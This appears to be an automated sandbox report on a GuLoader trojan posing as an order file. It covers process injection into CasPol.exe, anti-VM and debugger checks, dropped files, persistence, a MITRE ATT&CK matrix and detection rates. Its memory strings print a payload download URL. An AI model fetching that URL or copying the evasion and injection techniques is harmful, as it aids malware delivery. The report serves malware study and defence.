Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350058E	2_2_0350058E
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501DB6	2_2_03501DB6
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500DA3	2_2_03500DA3
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500050	2_2_03500050
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AC45	2_2_0350AC45
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506047	2_2_03506047
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03514446	2_2_03514446
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03511474	2_2_03511474
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506077	2_2_03506077
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500478	2_2_03500478
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501C7A	2_2_03501C7A
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03507C60	2_2_03507C60
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500862	2_2_03500862
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506466	2_2_03506466
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500013	2_2_03500013
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500001	2_2_03500001
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500403	2_2_03500403
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350B00C	2_2_0350B00C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500831	2_2_03500831
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500C3B	2_2_03500C3B
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350743D	2_2_0350743D
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035000D3	2_2_035000D3
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035004D4	2_2_035004D4
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035008D8	2_2_035008D8
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350A4CD	2_2_0350A4CD
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350A0F8	2_2_0350A0F8
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501CEE	2_2_03501CEE
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500499	2_2_03500499
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350089E	2_2_0350089E
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500CB6	2_2_03500CB6

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03514ADD NtResumeThread,		2_2_03514ADD
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03514446 NtResumeThread,		2_2_03514446

Source: GPUPowerSavingConfigEditor.dll.2.dr

Static PE information: No import functions for PE file found

Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameGPUPowerSavingConfigEditor.dll< vs Order_002376662-579588_Date 24082022.exe

Source: Order_002376662-579588_Date 24082022.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Order_002376662-579588_Date 24082022.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: Order_002376662-579588_Date 24082022.exe

Static PE information: invalid certificate

Source: Order_002376662-579588_Date 24082022.exe	Virustotal: Detection: 49%
Source: Order_002376662-579588_Date 24082022.exe	Metadefender: Detection: 27%
Source: Order_002376662-579588_Date 24082022.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

File read: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Jump to behavior

Source: Order_002376662-579588_Date 24082022.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe "C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe"
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

2_2_0040330D

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens

Jump to behavior

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

File created: C:\Users\user\AppData\Local\Temp\nsq713A.tmp

Jump to behavior

Source: classification engine

Classification label: mal80.troj.evad.winEXE@4/7@1/1

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Code function: 2_2_004020CB CoCreateInstance,MultiByteToWideChar,

2_2_004020CB

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Code function: 2_2_004045CA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

2_2_004045CA

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4392:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4392:120:WilError_03

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Platooned\Ananthropism

Jump to behavior

Source: Order_002376662-579588_Date 24082022.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000004.00000000.22683438457.0000000000F70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.27549390202.0000000000F70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_10002D20 push eax; ret	2_2_10002D4E
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03509BC5 push eax; ret	2_2_03509BD6
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035093CA push edx; retf	2_2_035093CB
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035043FC push 0000007Ah; iretd	2_2_03504410
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03507B92 push es; iretd	2_2_03507BCF
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03508E54 pushad ; retf	2_2_03508EFC
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350C24D push ss; ret	2_2_0350C2B6
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350C278 push ss; ret	2_2_0350C2B6
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03509209 push edi; ret	2_2_0350923C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03508E23 pushad ; retf	2_2_03508EFC
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350815E push ebx; ret	2_2_035081AE
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03509DA3 push esi; ret	2_2_03509DA4
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03508852 push cs; iretd	2_2_0350893B
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035080F8 push ebx; ret	2_2_035081AE
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03505099 push eax; iretd	2_2_0350509A
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03508CB9 pushad ; retf	2_2_03508EFC
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035088AC push cs; iretd	2_2_0350893B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 4_2_00F73270 push ecx; ret	4_2_00F73281
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 4_2_00F77A4E push cs; ret	4_2_00F77A50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 4_2_00F70817 push cs; retf	4_2_00F70821
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 4_2_00F739C0 push 0000002Ah; iretd	4_2_00F739D2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 4_2_00F71F8B push esp; retf	4_2_00F71F99

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Code function: 2_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

2_2_10001A5D

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers\GPUPowerSavingConfigEditor.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll			Jump to dropped file

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Noneffervescently.Cre	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Kalligraferendes	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Kalligraferendes\Quantisers	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Kalligraferendes\Quantisers\Aqua_20.bmp	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Forhaanet.Nab	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers\GPUPowerSavingConfigEditor.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers\face-cool.png	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79\iso_3166-1.json	Jump to behavior

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343143751.0000000003601000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.27550528953.00000000012B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343143751.0000000003601000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: CasPol.exe, 00000004.00000002.27550528953.00000000012B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=HTTP://MNHCKM.TK/EXPCRBJHZ225.U32

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 736

Thread sleep time: -90000s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers\GPUPowerSavingConfigEditor.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Code function: 2_2_0350275D rdtsc

2_2_0350275D

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	2_2_00405861
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0040639C FindFirstFileA,FindClose,	2_2_0040639C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_004026F8 FindFirstFileA,	2_2_004026F8

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	API call chain: ExitProcess graph end node			graph_2-31487
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	API call chain: ExitProcess graph end node			graph_2-31491

Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343489480.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343489480.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343143751.0000000003601000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v2.0.50727\caspol.exewindir=\syswow64\iertutil.dll
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343489480.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343489480.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343489480.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343489480.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343489480.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000004.00000003.24024087034.00000000010E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000004.00000002.27550528953.00000000012B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=http://mnhckm.tk/ExpCRBJHZ225.u32
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343143751.0000000003601000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.27550528953.00000000012B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343489480.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343489480.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 00000004.00000002.27549862711.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343489480.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23343489480.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Code function: 2_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

2_2_10001A5D

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Code function: 2_2_0350275D rdtsc

2_2_0350275D

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AB49 mov eax, dword ptr fs:[00000030h]	2_2_0350AB49
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350A311 mov eax, dword ptr fs:[00000030h]	2_2_0350A311
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03512F2F mov eax, dword ptr fs:[00000030h]	2_2_03512F2F
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03510E7B mov eax, dword ptr fs:[00000030h]	2_2_03510E7B
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AA62 mov eax, dword ptr fs:[00000030h]	2_2_0350AA62
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AA16 mov eax, dword ptr fs:[00000030h]	2_2_0350AA16
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AA2D mov eax, dword ptr fs:[00000030h]	2_2_0350AA2D
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AC45 mov ebx, dword ptr fs:[00000030h]	2_2_0350AC45
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AC45 mov eax, dword ptr fs:[00000030h]	2_2_0350AC45
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506047 mov eax, dword ptr fs:[00000030h]	2_2_03506047
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350DC7B mov eax, dword ptr fs:[00000030h]	2_2_0350DC7B
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AC04 mov eax, dword ptr fs:[00000030h]	2_2_0350AC04
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AC9B mov ebx, dword ptr fs:[00000030h]	2_2_0350AC9B

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Code function: 2_2_03510E99 LdrLoadDll,

2_2_03510E99

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: F70000

Jump to behavior

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

2_2_0040330D

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 Windows Service	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Windows Service	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	1 DLL Side-Loading	111 Process Injection	1 Access Token Manipulation	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	111 Process Injection	NTDS	4 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 DLL Side-Loading	1 Obfuscated Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Order_002376662-579588_Date 24082022.exe	49%	Virustotal		Browse
Order_002376662-579588_Date 24082022.exe	28%	Metadefender		Browse
Order_002376662-579588_Date 24082022.exe	65%	ReversingLabs	Win32.Trojan.Guloader

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers\GPUPowerSavingConfigEditor.dll	0%	Metadefender	Browse
